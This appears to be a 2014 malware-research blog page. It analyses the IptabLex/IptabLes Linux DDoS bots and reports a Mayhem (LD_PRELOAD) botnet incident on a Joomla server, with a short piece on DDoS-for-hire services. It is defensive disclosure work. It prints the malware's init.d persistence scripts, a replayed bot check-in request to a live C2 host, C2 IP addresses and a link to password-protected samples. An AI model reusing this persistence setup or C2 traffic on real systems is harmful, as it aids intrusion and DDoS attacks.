Monday, June 16, 2014

MMD-0025-2014 - ITW Infection of ELF .IptabLex & .IptabLes China #DDoS bots malware

The background

I think some of Linux sysadmins and malware researchers already know this issue well by reading references in sysadmin/linux forums or reported incident in works, or maybe facing this problem them self. Since the wave of attacks are still spotted and hitting several services with the known webapp vulnerabilities, yet there are no complete verdict details of the threat (yet), we feel it's important to raise an alert on this subject in MMD post as advisory to help fellow admins who may google info of this threat with hoping this may help giving thorough explanation. The recent vulnerability that was exploited to spread this malware infection is a per tweeted here:

Maybe some of us think that DDoS tools are just only infiltrating victim sites with some kids attemting to hack on unattended sites & installing their bots written in IRC Perl/PHP DDoS'er scripts. This post is a good reading for you who think that way, since it explained a more serious threat using ELF DoS binaries specifically built to conduct DDoS action in hacked Linux servers via serious root exploitation method in each infection. This threat is known as the infection of .IptabLex and .IptabLes ELF #DDoS backdoor trojan (malware). The infection was coming from China, and is world-wide now, hitting various Linux based services with new flaws in vulnerability and giving problems to some of us.
Here goes the details..

The worldwide incidents reported

First, how is the coverage of this infection? Below is the list of reported incidents of the current threat world wide, I followed & collected in chronological basis, all are referring to the same binary sets and similar infection modus operandi. Infected server's distributions are varied like Debian, Ubuntu, Slackware, CentOS to Redhat, via vulnerability in server application like Tomcat, Elasticsearch, Apache struts etc. But all of them are informing same vector of hack in code injection vulnerability.
FYI. No, we have not seen any FreeBSD or Mac OS X based server as victim (yet).

Jan 13 2014 at 15:26 (CHINA) [link]
Jan 18 2014 at 19:11 (EUROPE) [link]
Apr 10, 2014 (N/A) [link]
Apr 25, 2014 (N/A) [link]
May 4 2014 (HUNGARY) [link]
May 8 2014 (USA) [link]
May 12 2014 (US) [link]
May 25, 2014 (N/A) [link]
May 27, 2014 (VIETNAM) [link]
May 27, 2014 (N/A) [link]
Jun 3, 2014 (EUROPE) [link]
Jun 4, 2014 (N/A) [link]
Jun 8 2014 (EUROPE) [link]

Source of threat

The origin of the threat is coming from China, which can be technically described in the next analysis sections, but there are so many report posted about the threat in China sites with this reference -->>[here]

The symptoms of infection

An infected linux host will suffer the root privilege escalation and installed with the malware sets as per below details.

Malware main files will be located in either /boot or /usr as per below. It firstly tried to write in /boot , if fail the malware will be saved in /usr.

/boot/.IptabLes
/boot/.IptabLex
Or..
/usr/.IptabLes
/usr/.IptabLex

The malware will be accompanied by the autostart script:

$ ll -a /boot/Ip*
IptabLes -> /etc/rc.d/init.d/IptabLes
IptabLex -> /etc/rc.d/init.d/IptabLex
Contains:
$ sudo cat /etc/rc.d/init.d/IptabLex
#!/bin/sh
/boot/.IptabLex
exit 0

$ sudo cat /etc/rc.d/init.d/IptabLes
#!/bin/sh
/boot/.IptabLes
exit 0
The PID locked files will be detected:
$ ll -a /[InfectedPath]/
.mylisthb.pid
.mylisthbS.pid
.mylisthbSx.pid
.mylisthbx.pid
↑In most cases we found these files spotted in root (/) directory.

In the case that I was handled, the binaries and autostart scripts is having these size:

-r----x--x   1 xxx xxx 1103207 Apr 25 16:38 .IptabLes*
-r----x--x   1 xxx xxx  722392 Apr 25 16:38 .IptabLex*
-r----x--x   1 xxx xxx      33 Apr 25 16:IptabLes*
-r----x--x   1 xxx xxx      33 Apr 25 16:IptabLex*
While the first two are the malware binaries them self, following by the autostart scripts. Usually the infected host is having both binaries. The bigger size one is the newer and "advanced version", and the smaller one is limited version.

In some cases the "advanced" versions is having runtime problem and created segmentation fault (crash) as per lsof below:

$ sudo lsof -p 27322
.IptabLes 27322 root  cwd    DIR  253,0     4096       2 /
.IptabLes 27322 root  rtd    DIR  253,0     4096       2 /
.IptabLes 27322 root  txt    REG  104,1  1103243    5905 /boot/.IptabLes
.IptabLes 27322 root    0u   REG  253,0        5   98310 /.mylisthbS.pid
.IptabLes 27322 root    1u   REG  253,0        5   98313 /.mylisthb.pid
.IptabLes 27322 root    2u  sock    0,5      0t0 3442424 can't identify protocol
.IptabLes 27322 root    3u   raw             0t0 3445564 00000000:00FF->00000000:0000 st=07
.IptabLes 27322 root    4u   raw             0t0 3445565 00000000:00FF->00000000:0000 st=07
.IptabLes 27322 root    5u   raw             0t0 3445566 00000000:00FF->00000000:0000 st=07
Where the smaller size mostly runs well, as per reported lsof:
$ sudo lsof -p 2013
.IptabLex 2013 root  cwd    DIR   253,0     4096     2 /
.IptabLex 2013 root  rtd    DIR   253,0     4096     2 /
.IptabLex 2013 root  txt    REG   104,1   722580  5906 /boot/.IptabLex
.IptabLex 2013 root    0u   REG   253,0        5 98309 /.mylisthbSx.pid
.IptabLex 2013 root    1uW  REG   253,0        5 98311 /.mylisthbx.pid
.IptabLex 2013 root    2u  IPv4 3479690      0t0   TCP x.x.x.x:10038->59.63.167.168:1001 (ESTABLISHED)
The netstat connection upon started upon malware success running and connected to the backdoor can be seen like this:
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0    157 x.x.x.x:53534     119.145.148.76:905      ESTABLISHED 20543/.IptabLex     
There will be also some UDP ports opened as per below:
udp  0   0 0.0.0.0:51152  0.0.0.0:*  20595/.IptabLes
udp  0   0 0.0.0.0:51152  0.0.0.0:*  20595/.IptabLes
udp  0   0 0.0.0.0:43193  0.0.0.0:*  20832/.IptabLes
udp  0   0 0.0.0.0:43193  0.0.0.0:*  20832/.IptabLes
udp  0   0 0.0.0.0:43193  0.0.0.0:*  20832/.IptabLes
udp  0   0 0.0.0.0:43193  0.0.0.0:*  20832/.IptabLes
And the SYN packet generated from the infected host will look like this:
tcp  0   1 x.x.x.x:52831  59.63.167.167:666       SYN_SENT    20539/.IptabLes
tcp  0   1 x.x.x.x:36089  119.145.148.56:666      SYN_SENT    20389/.IptabLes
tcp  0   1 x.x.x.x:36089  119.145.148.56:666      SYN_SENT    20389/.IptabLes
tcp  0   1 x.x.x.x:34365  112.33.19.8:666         SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:34365  112.33.19.8:666         SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:34365  112.33.19.8:666         SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:35443  122.228.242.51:666      SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:35443  122.228.242.51:666      SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:35443  122.228.242.51:666      SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:58164  59.63.167.167:666       SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:36720  119.145.148.56:666      SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:36720  119.145.148.56:666      SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:55258  119.145.148.76:666      SYN_SENT    20613/.IptabLex
tcp  0   1 x.x.x.x:55258  119.145.148.76:666      SYN_SENT    20613/.IptabLex
tcp  0   1 x.x.x.x:55389  119.145.148.76:666      SYN_SENT    20860/.IptabLex
tcp  0   1 x.x.x.x:34994  112.33.19.8:666         SYN_SENT    20832/.IptabLes
tcp  0   1 x.x.x.x:55389  119.145.148.76:666      SYN_SENT    20860/.IptabLex
tcp  0   1 x.x.x.x:34994  112.33.19.8:666         SYN_SENT    20832/.IptabLes
tcp  0   1 x.x.x.x:55389  119.145.148.76:666      SYN_SENT    20860/.IptabLex
tcp  0   1 x.x.x.x:34994  112.33.19.8:666         SYN_SENT    20832/.IptabLes

Definition of the Malware

This malware is the DDoS bot ELF malware variant, with a bot backdoor function connected to the CNC which sending them instruction to attack targeted hosts by SYN Flood or DNS Flood DoS techniques. It was autostarted as daemon everytime the host's services started.

So far we see no RAT (Remote Access Trojan) functionality spotted unless for the specific DoS bot functions, and also no sign of rootkits/system environment deletion detected except the additional of autostart scripts.
The deletion process of this malware can be performed safely by execution of the below commands:

$ sudo rm -f /.mylisthb*  
$ sudo  rm -f /boot/.IptabLex
$ sudo  rm -f /boot/.IptabLes
$ sudo  rm -f /usr/.IptabLex
$ sudo  rm -f /usr/.IptabLes 
$ sudo  rm -f /etc/rc.d/init.d/IptabLex
$ sudo  rm -f /etc/rc.d/init.d/IptabLes
The further observation of the binaries we know that it was originated in China Linux environment.

According to the reported cases it has backdoors connected to China IP addresses as per recorded data below:

119.145.148.76||4134 | 119.144.0.0/14 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK
42.62.36.237  ||23724 | 42.62.32.0/21   | CHINANET-IDC-BJ | CN | - | FOREST ETERNAL COMMUNICATION TECH. CO.LTD
And recorded targets, also go to the China networks:
119.145.148.56||4134 | 119.144.0.0/14 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK
59.63.167.167||4134 | 59.62.0.0/15 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET JIANGXI PROVINCE NETWORK
59.63.167.168 ||4134  | 59.62.0.0/15    | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET JIANGXI PROVINCE NETWORK
112.33.19.8||9808 | 112.0.0.0/10 | CMNET | CN | CHINAMOBILELTD.COM | CHINA MOBILE COMMUNICATIONS CORPORATION
61.147.110.119||23650 | 61.147.110.0/24 | CHINANET-JS-AS | CN | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK
61.174.41.15|15.41.174.61.dial.hu.zj.dynamic.163data.com.cn.|4134 | 61.174.0.0/16 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET-ZJ NINGBO NODE NETWORK

Binary Analysis

ELF file type:

IptabLes: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
IptabLex: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
With noted:
- There is no dynamic section in this file.
- There are no section groups in this file.
- There are no relocations in this file.
- There are no unwind sections in this file.
The header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF32
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x8048110
  Start of program headers:          52 (bytes into file)
  Start of section headers:          648072 (bytes into file)
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         5
  Size of section headers:           40 (bytes)
  Number of section headers:         39
  Section header string table index: 36
..and Section Headers:
Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .note.ABI-tag     NOTE            080480d4 0000d4 000020 00   A  0   0  4
  [ 2] .init             PROGBITS        080480f4 0000f4 000017 00  AX  0   0  4
  [ 3] .text             PROGBITS        08048110 000110 0695a8 00  AX  0   0 16
  [ 4] __libc_freeres_fn PROGBITS        080b16c0 0696c0 00100f 00  AX  0   0 16
  [ 5] __libc_thread_fre PROGBITS        080b26d0 06a6d0 0001db 00  AX  0   0 16
  [ 6] .fini             PROGBITS        080b28ac 06a8ac 00001c 00  AX  0   0  4
  [ 7] .rodata           PROGBITS        080b28e0 06a8e0 01554c 00   A  0   0 32
  [ 8] __libc_atexit     PROGBITS        080c7e2c 07fe2c 000004 00   A  0   0  4
  [ 9] __libc_subfreeres PROGBITS        080c7e30 07fe30 000030 00   A  0   0  4
  [10] __libc_thread_sub PROGBITS        080c7e60 07fe60 000008 00   A  0   0  4
  [11] .stapsdt.base     PROGBITS        080c7e68 07fe68 000001 00   A  0   0  1
  [12] .eh_frame         PROGBITS        080c7e6c 07fe6c 00b4fc 00   A  0   0  4
  [13] .gcc_except_table PROGBITS        080d3368 08b368 00010c 00   A  0   0  1
  [14] .tdata            PROGBITS        080d4474 08b474 000014 00 WAT  0   0  4
  [15] .tbss             NOBITS          080d4488 08b488 000018 00 WAT  0   0  4
  [16] .ctors            PROGBITS        080d4488 08b488 000008 00  WA  0   0  4
  [17] .dtors            PROGBITS        080d4490 08b490 00000c 00  WA  0   0  4
  [18] .jcr              PROGBITS        080d449c 08b49c 000004 00  WA  0   0  4
  [19] .data.rel.ro      PROGBITS        080d44a0 08b4a0 00002c 00  WA  0   0  4
  [20] .got              PROGBITS        080d44cc 08b4cc 000008 04  WA  0   0  4
  [21] .got.plt          PROGBITS        080d44d4 08b4d4 00000c 04  WA  0   0  4
  [22] .data             PROGBITS        080d44e0 08b4e0 000900 00  WA  0   0 32
  [23] .bss              NOBITS          080d4de0 08bde0 0041f8 00  WA  0   0 32
  [24] __libc_freeres_pt NOBITS          080d8fd8 08bde0 000014 00  WA  0   0  4
  [25] .comment          PROGBITS        00000000 08bde0 000398 00      0   0  1
  [26] .debug_aranges    PROGBITS        00000000 08c178 000120 00      0   0  1
  [27] .debug_pubnames   PROGBITS        00000000 08c298 000850 00      0   0  1
  [28] .debug_info       PROGBITS        00000000 08cae8 0079a5 00      0   0  1
  [29] .debug_abbrev     PROGBITS        00000000 09448d 0014a8 00      0   0  1
  [30] .debug_line       PROGBITS        00000000 095935 0018a2 00      0   0  1
  [31] .debug_frame      PROGBITS        00000000 0971d8 000cfc 00      0   0  4
  [32] .debug_str        PROGBITS        00000000 097ed4 0016f2 01  MS  0   0  1
  [33] .debug_loc        PROGBITS        00000000 0995c6 0046d9 00      0   0  1
  [34] .debug_ranges     PROGBITS        00000000 09dc9f 000300 00      0   0  1
  [35] .note.stapsdt     NOTE            00000000 09dfa0 000230 00      0   0  4
  [36] .shstrtab         STRTAB          00000000 09e1d0 0001b8 00      0   0  1
  [37] .symtab           SYMTAB          00000000 09e9a0 009700 10     38 948  4
  [38] .strtab           STRTAB          00000000 0a80a0 0085f4 00      0   0  1
The smaller size and big size is different in Symbol table '.symtab' entries, if you diff the table functions, the newer version (the bigger in size) is suggesting the "advanced mode" version with the "pro" features:
  2030: 08049750   130 FUNC    GLOBAL DEFAULT    3 CheckPro
  1946: 08049820    40 FUNC    GLOBAL DEFAULT    3 AddProList
  1022: 080496c0    39 FUNC    GLOBAL DEFAULT    3 FreeProList
  1671: 08049850   106 FUNC    GLOBAL DEFAULT    3 CreateProlist
..and also having more additional "features":
   424: 0806816e    13 FUNC    LOCAL  DEFAULT    3 _L_lock_30
   425: 0806817b    10 FUNC    LOCAL  DEFAULT    3 _L_unlock_120
  1022: 080496c0    39 FUNC    GLOBAL DEFAULT    3 FreeProList
  1081: 08068190   159 FUNC    GLOBAL DEFAULT    3 __getdents
  1162: 08049950   191 FUNC    GLOBAL DEFAULT    3 FindPtr
  1242: 080676f0   107 FUNC    GLOBAL DEFAULT    3 __strncasecmp
  1258: 0804ca20   442 FUNC    GLOBAL DEFAULT    3 killpeofnames
  1379: 080680c0   174 FUNC    WEAK   DEFAULT    3 readdir
  1381: 080d40c0 0x5aadd OBJECT  GLOBAL DEFAULT   22 filebyte
  1438: 080676f0   107 FUNC    WEAK   DEFAULT    3 strncasecmp
  1632: 08049a10    57 FUNC    GLOBAL DEFAULT    3 FindCptr
  1670: 080680c0   174 FUNC    GLOBAL DEFAULT    3 __readdir
  1760: 08049be0   208 FUNC    GLOBAL DEFAULT    3 WriteToFiles
  1785: 08050060   325 FUNC    GLOBAL DEFAULT    3 __deallocate_stack
  2041: 080d40a0     4 OBJECT  GLOBAL DEFAULT   22 constfilesize
  2052: 0804c720   106 FUNC    GLOBAL DEFAULT    3 tttaaa
  2209: 0804c6c0    82 FUNC    GLOBAL DEFAULT    3 mystristr
  2212: 0812ebc0   576 OBJECT  GLOBAL DEFAULT   22 tttxsa

Reverse Engineering Highlights

These are the source codes file list of this malware in C language:

'crtstuff.c'
'atk.c'
'common.c'
'zlib.c'
'list.c'
'main.c'
'mypth.c'
'Service.c'
'srvnet.c'
'udptest.c'
Reversing this malware is interesting, and overall reverse effort was taking longer time than I thought. In this highlight I will guide you to the best way to go to the malicious code PoC the verdict the DoS activities. After choosing your best disassembler, I suggest you start trailing the function in address .text:0804DA40 called startmain() to find the good trail that can lead you to the DDoS functions (the verdict) soon:
public startmain
startmain   proc near 
var_18      = dword ptr -18h
var_14      = dword ptr -14h
var_10      = dword ptr -10h
arg_0       = dword ptr  8
push    ebp
mov     ebp, esp
push    edi
mov     edi, offset aBoot_iptables ; contains "/boot/.IptabLes or Iptablex"
push    esi
push    ebx
  :
You should find the PID and its locking can be followed afterwards from .text:0804DAF5 (for the checking are you trailing the right path..):
mov     [esp+18h+var_18], offset LOCKFILEX ; "/.mylisthbS"
call    promutex
sub     eax, 1
  :
call    getpid
call    fork
Followed by the fork function at .text:080533B0 below:
fork    proc near           
        push    ebp         
        mov     ebp, esp
        pop     ebp
        jmp     __libc_fork
fork    endp
Seek the calls lead to this function's start addeess (0x80533B0) and you will see the main DDoS function directly referring to it:
SynFloodThread
DnsFloodThread
The above functions are DoS function which can be reversed as per here-->>[Pastebin] and here-->>[Pastebin], which can be breakdown deeper in how the SYN or UDP packets were formed, randomization of size and the build then followed by the sending thread. The details of those sub functions I will not cover here since it is going to be very long (but please feel free to comment for requests), and the pastebins showed enough evidence of the attack act performed by this flooder.

Let's moving on. In the .rodata:080B3360 you'll find the URL that the malware use for "test purpose", which can help PoC'ing the origin of this malware w/o much heavy reversing:

h00p://www.yahoo.com
h00p://www.baidu.com
h00p://www.china.com
h00p://www.ifeng.com
As you can see, three of the listed sites are Chinese web sites. The other things that can help to ID is the multilanguage Linux trace detected and the way it compiled the binaries (based on previous reference of similar threat from same origin, it is typical)

More malicious activities on the update server's data (link) which clearly show the fetch for updates then save it and deleting those upon done, infected host's sensitive information taken (link), getting networking information of the infected host (link), and hard coding installation of autostart scripts and installation steps (link) which PoC'ed all of the symptoms written above. For the own data handle itself this malware uses a compression logic with the decompression logic that's so "spaghetti coded" like the image below:

..with the code can be viewed here (link) ; Note: All reversed snips can be viewed in each shown disassembler links.

Analysis Samples & Virus Total

Samples are all in Virus Total already with the below hashes, under detection ratio between 3/54 to 8/54:

4baf340e3701b640ad36fb8f606e2aa7f494dd34dc3315c0943f3325c7766f80
a65f430a03c3717250d15d5745ec7c36a60962ae6473938ee545a0267b6857a4
86f34d9974f42ed557f4ae998da50af04b04b03c7e5cf01279ad1ca6bbb4ab1a
fa5e8571c93abbaf7014c9fcecffedeffdac0a3a15d459036fb149a47dfcfb61
d3dafa7f23858711a5fbc195f934b6891114e44d23c86796b2c042f1c2b6e026
ec546a0084120070ee0ea6f00673e42ca13c85f5bd8375a4e62d88541152de6d
(thank's to "Angel Hun" for the last two samples!)
For fellow researchers, sysadmins or IR friends, I am sharing samples below:
2014/04/25  16:38         1,103,207 boot-.IptabLes
2014/04/25  16:38           722,392 boot-.IptabLex
2014/04/25  16:39                33 etc-rc.d-init.d-IptabLes
2014/04/25  16:39                33 etc-rc.d-init.d-IptabLex
2014/01/19  16:09         1,103,245 src-IptabLes
2014/01/19  16:09           722,582 src-IptabLex
That can be downloaded here-->>[MMD Mediafire] with the usual password.

Intelligence Report of Iptables|x

Tiger Security [link], the cyber intelligence and information security entity, was just releasing the detail intelligence report of this threat which explaining the CNC operation behind the scene, as per written in their good report here-->[link]

Additionals:

For the questions and comments are welcome. I need more samples of the recent incidents, if you happen to know ones please help to send us the sample via the DropBox link in the right panel in our (this) blog menu. The comment with the sensitive information or privacy will not posted. With thank you in advance.

#MalwareMustDie!

Wednesday, June 11, 2014

MMD-0024-2014 - Recent Incident Report of Linux/Mayhem (LD_PRELOAD) libworker.so "Mayhem" Linux malware botnet attack in Joomla! VPS

I haven't got enough time to write a beautiful report about this incident, please kindly bear with the textual paste format at the moment. This is an important incident report, progressing the the massive infection malware case that was initially reported in here-->>[MMD Blog] . The latest reported incident before this one is here-->>[MMD Pastebin]

Raw text of current incident report is in here -->>[MMD Pastebin] and-->>[MMD Pastebin], for the video tutorial to extract, kill, debug & traffic capture ELF .so shared library malware that's using LD_PRELOAD is in here-->>[MMD Blog]

..and below is the current incident textual contents:

MalwareMustDie NEW Report of .SO ELF Malware attack incident.
date: Wed Jun 11 06:38:13 JST 2014
Analysis by @unixfreaxjp - Report & source investigation thx to: yin
Case: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
CNC is ALIVE in : "89.45.14.64 (VOXILITY, ROMANIA)"
ATTACKER SOURCE IP: "103.31.186.33 (VOXILITY, ROMANIA) &  31.202.247.234 (Leased line ISP Format, UKRAINE)"

//-------------------------------------
// PHP HACK INJECTION POC
// VICTIMS WEBAPP: JOOMLA!
//-------------------------------------

// Reported Injected installation .SO Bins
https://www.virustotal.com/en/file/324b1b77ff9c0759e3d2ab1efb9439a3a850d94bd9f1968a0f093a782b5ea990/analysis/1402437076/
https://www.virustotal.com/en/file/203eeac48d08cac9b36187bfb32bd88d29f1f44d4306f2ffc154538573e5d722/analysis/1402437106/

// Jinxed code installer PHP scripts in pastebin:
http://pastebin.com/z1K8jxKJ
http://pastebin.com/Pbsk3ZXU

// Malware Binaries extracted from installer PHP:
https://www.virustotal.com/en/file/c28e2ebc5046c1a03a8f689b757cf2a90d021eeaa0a5e9ec91aa33c76ee6237f/analysis/1402437331/
https://www.virustotal.com/en/file/af71138bc3b2e70fd1d8fd33c31a4707d686d893661a331aee68f223348e164e/analysis/1402437372/

//-------------------------------------
// CNC ANALYSIS
// Using knowhow from: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
//-------------------------------------

// Extract the bins w/ template:
$ date
Wed Jun 11 04:12:11 JST 2014
$
$ php ./sodump-template.php
SO x32 dumped 26848
SO x64 dumped 27288
MO x32 dumped 26848
MO x64 dumped 27288
$
$ ls -alF
total 600
drwxrwxrwx   2 xxx xxx    512 Jun 11 04:12 ./
drwxrwxrwx  13 xxx xxx    512 Jun 11 03:59 ../
-rw-r--r--   1 xxx xxx  26848 Jun 11 04:12 "libworker1-32.so"
-rw-r--r--   1 xxx xxx  27288 Jun 11 04:12 "libworker1-64.so"
-rw-r--r--   1 xxx xxx  26848 Jun 11 04:12 "libworker2-32.so"
-rw-r--r--   1 xxx xxx  27288 Jun 11 04:12 "libworker2-64.so"

$ md5 lib*
MD5 (libworker1-32.so) = 15584bc865d01b7adb7785f27ac60233
MD5 (libworker1-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
MD5 (libworker2-32.so) = 15584bc865d01b7adb7785f27ac60233
MD5 (libworker2-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
// noted see only one x32 and one x64 binaries used for multiple injection..


$ file lib*
libworker1-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
libworker1-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
libworker2-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
libworker2-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
$

// CNC:

POST /kuku/theend.php HTTP/1.0
Host: erstoryunics.us
Pragma: 1337
Content-Length: 84

R,20130826,64,0,,UNIX SCO System - MalwareMustDie Bangs Moronz CNC,
HTTP/1.1 200 OK
Date: Tue, 10 Jun 2014 22:12:22 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 6
Connection: close
Content-Type: text/html; charset=UTF-8
R,200

// CNC INFO (NETWORK & GEOIP)

$ echo `dig +short erstoryunics.us`|bash origin.sh
Wed Jun 11 06:28:03 JST 2014|89.45.14.64||39743 | 89.45.14.0/24 | VOXILITY | MD | - | IM INTERNET MEDIA SRL
IP Address, City, Country Name, Latitude, longitude, Time Zone
89.45.14.64, , Romania, 46.0, 25.0, Europe/Bucharest

//-------------------------------------
// ATTACK TIME RANGE:
//-------------------------------------

First session: "[22/May/2014:13:01:08 +1000]"
2nd Session First: "[09/Jun/2014:07:50:46 +1000]" 
2nd Session Latest:"[10/Jun/2014:04:39:51 +1000]"

//-------------------------------------
// ATTACKER ACCESS POC & SOURCE IP POC:
//-------------------------------------

// Attacker access log aiming the PHP .SO Malware installer PHP script: 

103.31.186.33 - - [09/Jun/2014:07:50:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:03:34:23 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:04:10:30 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:04:39:51 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:07:56:45 +1000] "GET /cache.php HTTP/1.0" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:19:50:28 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:21:39:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:22:10:14 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:06:25:18 +1000] "GET /jquery.js.php HTTP/1.0" 200 71 "-" "-"
31.202.247.234 - - [22/May/2014:13:01:08 +1000] "GET /cache/cache.php HTTP/1.1" 200 17943 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"


//-------------------------------------
 Tracing attacker source IP: "103.31.186.33 (ROMANIA)"
//-------------------------------------

$ whois 103.31.186.33
% [whois.apnic.net]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
 
% Information related to '103.31.186.0 - 103.31.186.127'
 
inetnum: 103.31.186.0 - 103.31.186.127
netname: Saulhost
descr: Saulhost Hosting
country: RO
admin-c: MT669-AP
tech-c: MT669-AP
status: ASSIGNED NON-PORTABLE
remarks: INFRA-AW
mnt-by: MAINT-HK-VOXILITY
mnt-lower: MAINT-HK-VOXILITY
mnt-routes: MAINT-HK-VOXILITY
mnt-irt: IRT-VOXILITY-AP
changed: noc@voxility.com 20130118
source: APNIC
 
irt: IRT-VOXILITY-AP
address: Dimitrie Pompeiu 9-9A
address: Building 24
address: Bucharest 020335
address: Romania
e-mail: noc@voxility.com
abuse-mailbox: noc@voxility.com
admin-c: VOX100
tech-c: VOX100
auth: # Filtered
mnt-by: MAINT-HK-VOXILITY
changed: noc@voxility.com 20121015
source: APNIC
 
person: Michael Ter-Sahakyan
address: Terbatas 14
address: LV-1011 Riga
address: Latvia
country: RO
phone: +37166163312
e-mail: abuses@saulhost.com
nic-hdl: MT669-AP
remarks: INFRA-AW
abuse-mailbox: abuses@saulhost.com
mnt-by: MAINT-HK-VOXILITY
changed: noc@voxility.com 20130118
source: APNIC

//-------------------------------------
 Tracing attacker source IP: "31.202.247.234 (UKRAINE)"
//-------------------------------------

 
$ whois 31.202.247.234
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
 
% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.
 
% Information related to '31.202.192.0 - 31.202.255.255'
 
% Abuse contact for '31.202.192.0 - 31.202.255.255' is 'abuse@maxnet.ua'
 
inetnum: 31.202.192.0 - 31.202.255.255
netname: FORMAT-TV-NET-5
descr: MSP Format Ltd.
country: UA
admin-c: FA4288-RIPE
tech-c: FA4288-RIPE
status: ASSIGNED PA
mnt-by: FORMAT-TV-MNT
mnt-domains: FORMAT-TV-MNT
mnt-routes: FORMAT-TV-MNT
source: RIPE # Filtered
 
person: Format Admin
address: Ukraine Mariupol
phone: +380629422490
nic-hdl: FA4288-RIPE
mnt-by: FORMAT-TV-MNT
source: RIPE # Filtered
 
% Information related to '31.202.247.0/24AS6712'
 
route: 31.202.247.0/24
descr: Leased line ISP Format
origin: AS6712
mnt-by: FORMAT-TV-MNT
source: RIPE # Filtered
CNC callback screenshot (the second take) :

#MalwareMustDie!

Monday, June 9, 2014

DDoS'er as Service - a camouflage of legit stresser/booter/etc

The background

After visiting some hacked FTP sites as per reported in the previous posts [-1-] and [-2-] , I figured out connection that some IRC scripts running leads to the group/individuals performing a DDoS'er attack services. I personally found it interesting to check thorough and deeper to its source, so this weekend I made a visit to DDoS'er as services with some records on of their malicious activities. The reason is simply investigation to confirm some segment of IPs gathered from previous cases to these services. During the trip I made memo in here and there so this post will gather it all for the easier search. So it is not about bragging anything to anyone, just a share.

DDoS as Service

DDoS and their services are not a new stuff. These services are cleverly hiding their maliciousness under the words of "for education" or "for tester" and so on, in their promotion or TOS statement written in their public home pages or via description in the demonstration videos they uploaded to some video sites. However, if you see some XXX and YYY communities where hackers are gathered, these services are making strong campaign in a very different tone, the usage of terms like "powerful", "hit", "takedown" and so on came up in the surface that are suggesting attack tools in promotion. Further, we can see screenshots of "success attack" in real cases that were openly shared to proof how "powerful" their services are. The video posted in here will explain more than words of the previous statements. So the market is there, with youngsters are in majority, and we can say it is a fruitful steady money to catch, explaining the competitive promotion.

Among tons of "DDoS'er As Service" spotted, the below list is some that I picked to study. I extracted their campaign and details information in the snapshots of campaign images & videos in the next section, some are including a bit of comments.

NetGuard
Big Bang Booter
Critical Stresser
Wrath Stresser
Apocalypse Stresser
Titanium Stresser

Collected Items

For MMD friends' who like this collection, I gathered some of the campaign materials they are using. Well, they really love to use a real (literally..in size) long promotion which mentioning similar terms in pricing, duration on service and TOS. With reckoning one same term that they all used: a no refundable payment :-)

In a short limited time I can managed to compile videos of these services that contains the demonstration (to be clear: is what they provided, not me), is a quite good reference for learning what these are actually about:



Some DDoS/Stresser/Booter terms to know..

